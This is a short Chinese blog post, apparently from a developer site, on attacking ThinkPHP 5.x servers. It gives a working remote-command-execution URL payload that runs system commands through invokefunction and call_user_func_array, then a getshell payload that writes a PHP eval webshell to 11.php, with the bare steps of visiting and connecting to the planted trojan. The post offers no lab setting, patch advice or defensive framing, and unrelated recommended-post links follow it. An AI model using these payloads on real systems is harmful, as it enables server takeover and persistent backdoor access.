Thinkphp5x远程命令执行及getshell

养只小羊72024-08-09 0:39

访问到网址

拼接网址,执行远程命令

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

可执行php命令

getshell

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" >11.php

访问木马

连接木马

相关推荐
写代码的小王吧2 小时前
【网络安全】安全的网络设计
网络·网络协议·tcp/ip·安全·web安全·网络安全·docker
炫彩@之星2 小时前
mysql数据库中getshell的方式总结
mysql·网络安全·渗透测试·getshell
一口一个橘子5 小时前
[ctfshow web入门] web6
web安全·网络安全
virelin_Y.lin16 小时前
系统与网络安全------Windows系统安全(9)
windows·web安全·系统安全·iis
zhu128930355619 小时前
网络安全防护与挑战
网络·安全·web安全
网络安全天地19 小时前
使用 Flutter 制作地图应用
websocket·网络协议·tcp/ip·http·网络安全·https·udp
神经毒素20 小时前
WEB安全--文件上传漏洞--36C3 CTF includer bypass
linux·安全·web安全
网络安全指导员1 天前
如何在JMeter中配置断言,将非200状态码视为测试成功
网络·学习·jmeter·安全·web安全·架构
红肤色1 天前
【网络安全基础】CentOS 7超详细安装教程(含镜像)
linux·运维·服务器·安全·网络安全·centos
热门推荐
01汽车上的各种质量:整备质量、总质量、装载质量、簧上质量、簧下质量02我决定放弃搞 Java 了03如何在WPS和Word/Excel中直接使用DeepSeek功能04第七章 功能规范05DeepSeek各版本说明与优缺点分析06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑07linux 安装 mysql记录08RAG 实践- Ollama+RagFlow 部署本地知识库09DeepSeek RAGFlow构建本地知识库系统10智能驾驶中预测模块简介